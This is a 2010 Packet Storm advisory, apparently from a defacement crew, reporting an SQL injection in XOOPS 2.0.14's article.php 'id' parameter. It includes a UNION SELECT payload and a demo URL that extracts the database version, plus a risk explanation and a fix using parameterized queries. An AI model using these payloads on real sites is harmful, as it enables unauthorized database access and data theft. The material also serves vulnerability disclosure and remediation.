XOOPS 2.0.14 SQL Injection

2010-08-30T00:00:00
ID PACKETSTORM:93276
Type packetstorm
Reporter []0iZy5
Modified 2010-08-30T00:00:00

Description

                                        
                                            `##################################################################  
##################################################################  
# ___ ___ _ _____ __ _ #  
# / _ \ / _ \| | | __ \ / _| | | #  
# _ __| | | | | | | |_| | | | ___| |_ __ _ ___ ___ __| | #  
# | '__| | | | | | | __| | | |/ _ \ _/ _` |/ __/ _ \/ _` | #  
# | | | |_| | |_| | |_| |__| | __/ || (_| | (_| __/ (_| | #  
# |_| \___/ \___/ \__|_____/ \___|_| \__,_|\___\___|\__,_| #  
# #  
# #  
# +-+-+-+-+ #  
# |C|r|e|w| #  
# +-+-+-+-+ #  
##################################################################  
##################################################################  
# [#] XOOPS 2.0.14 (article.php) SQL Injection Vulnerability #  
# [#] Discovered By []0iZy5 #  
# [#] http://r00tDefaced.com & uNkn0wn.eu(is back) #  
# [#] Greetz: Gn0515, Silic0n, my bb(denys) & r00tDefaced Members#  
##################################################################  
#  
# [2]-SQL injection  
#  
# Vulnerability Description:  
# SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an #application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby unexpectedly executed.  
#  
# Affected items:  
# http://127.0.0.1/path/modules/articles/article.php?id=[SQL Injection]  
#   
# Example: -1337+uNiOn+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- [You can find the number of vulnerable query]  
# Demo: http://www.site.com/modules/articles/article.php?id=1%20union%20all%20select%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--  
#  
# The Risk:  
# By exploiting this vulnerability, an attacker can inject malicious code in the script and can have access to the database.  
#  
# Fix the vulnerability:  
# To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parametrized statements must be used #(preferred), or user input must be carefully escaped or filtered.  
#  
#################################################################  
#################################################################  
  
# r00tDefaced.com [28/08/2010]  
  
`